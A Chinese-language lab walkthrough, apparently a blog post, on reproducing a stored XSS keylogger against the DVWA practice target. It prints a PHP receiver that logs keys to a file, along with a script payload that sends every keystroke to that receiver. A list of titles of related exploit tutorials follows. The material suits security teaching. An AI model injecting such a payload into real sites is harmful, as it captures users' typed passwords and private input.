实验环境:

  • PHPstudy
  • 火狐浏览器、IE
  • DVWA靶场

实验准备:

在www目录下创建一个名为keylog.php的文件,代码如下:

<?php
$file = fopen("key.txt","a");
if(isset($_REQUEST['key'])) {$key = $_REQUEST['key'];fputs($file,$key);
}
?>

模拟实验:

1、把级别调成low,选择Stored储存型,打开F12将输入限制改为500

2、将下列代码输入执行,效果如下
<script>document.onkeydown=function(ev){xhr=new XMLHttpRequest();xhr.open('POST','http://localhost/keylog.php',true);xhr.setRequestHeader('Content-type','application/X-WWW-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode));}</script>

3、然后随便输入什么东西,key.txt中就会出现记录,键盘记录器就做完了

漏洞复现篇——利用XSS漏洞实现键盘记录相关推荐

  1. 漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法

    实验环境: PHPstudy 火狐浏览器 DVWA靶场 模拟实验: 重定向钓鱼 把当前页面重定向到一个钓鱼页面,例如重定向到百度,代码如下: <script>document.locati ...

  2. LINUX漏洞复现篇之ShellShock漏洞

    简介 ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞 在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bas ...

  3. 利用XSS漏洞实现键盘记录器

    利用XSS漏洞实现键盘记录器 本实验以反射性的XSS漏洞为例 实验环境:dvwa靶机(ip:192.168.135.140) kali linux(ip:192.168.135.138) 1.首先开启 ...

  4. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  5. 利用xss漏洞结合xss平台实现社工钓鱼

    本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它 ...

  6. 【网络安全】如何使用ppmap检测和利用XSS漏洞

    关于ppmap ppmap是一款基于Go开发的漏洞扫描器/漏洞利用工具,该工具能够通过在全局上下文中检查特定变量来扫描.检测和利用XSS漏洞.该工具目前只能利用已知Gadget(可能支持部分自定义开发 ...

  7. html %3c 不给转义,八个无法利用XSS漏洞的场景

    ☝☝ 相信有很多的小盆友们曾经发现过一些疑似存在XSS漏洞的站点,但又无法完全证明这个漏洞是可以被利用的.此时的你可能处于怀疑状态,也有可能你已经验证到一半了,严重怀疑其有精神病(XSS漏洞)的情况. ...

  8. ms08_067,ms10_046漏洞复现与利用

    ms08_067,ms10_046漏洞复现与利用 一:ms08_067 主机扫描 通过nessus扫描网段内存活的主机,发现192.168.206.142该靶机并且时xp而且开启了445端口,考虑使用 ...

  9. 怎样利用XSS漏洞在其它网站注入链接?

    怎样利用XSS漏洞在其它网站注入链接? 什么是XSS攻击 怎样利用XSS漏洞在别人网站注入链接 XSS攻击注入的链接有效果吗? 对搜索结果的潜在影响有多大? 作弊和黑帽SEO 黑帽SEO是相对于白帽而 ...

最新文章

  1. Android 调试 Release 包(debuggable)
  2. usaco2.1.2(frac1)
  3. linux 命令之电子书chm格式下载
  4. 实验一  简单词法分析程序设计
  5. 图论算法》关于SPFA和Dijkstra算法的两三事
  6. 【2017年第1期】CCF大专委2017年大数据发展趋势预测
  7. 程序员除了上班,还可以怎么赚钱?
  8. Convert Sorted List to Binary Search Tree ------C++ 递归创建平衡二叉查找树
  9. Linux 僵尸进程查杀
  10. MySQL - 查询今天的数据(以及昨天、本月、上个月、今年...)
  11. Java视频教程下载地址汇总
  12. 牛腩新闻发布--.NET控件FreeTextBox使用方法
  13. 软件专业大学生常用的刷题、找答案、找资源的网站
  14. 永磁同步电机矢量控制(六)——MTPA最大转矩电流比控制
  15. 阿里云 DataV 产品简介
  16. 英飞凌XC2000系列——汽车ECU Bootloader 设计详解
  17. Maven配置错误: The JAVA_HOME environment variable is not defined correctly
  18. 6个步骤教你用Python解数独!(含实例代码)
  19. KubeEdge Node not ready
  20. 怎么将视频配套讲义打印出来

热门文章

  1. 交叉编译cups-2.3.3
  2. 弦振动 matlab,弦振动规律及MATLAB数据处理
  3. 【搬运】射手播放器下载字幕存储位置及修改方法
  4. java企业级快速开发平台jeeadminlte(jeesite大胖老师修改版)
  5. ValueError: List argument ‘indices‘ to ‘Sparse Concat‘ Op with length 0 shorter than minimum length2
  6. mysql常用操作(二)
  7. 不再羡慕小说中的爱情...
  8. 原定7月30日上线的《暗黑破坏神:不朽》又又又”跳票“了,突发上线,如何在电脑上畅玩?
  9. python 推箱子实验开发报告,python实现推箱子游戏
  10. 有哪些权威的职业性格测试?职业性格测试靠谱吗?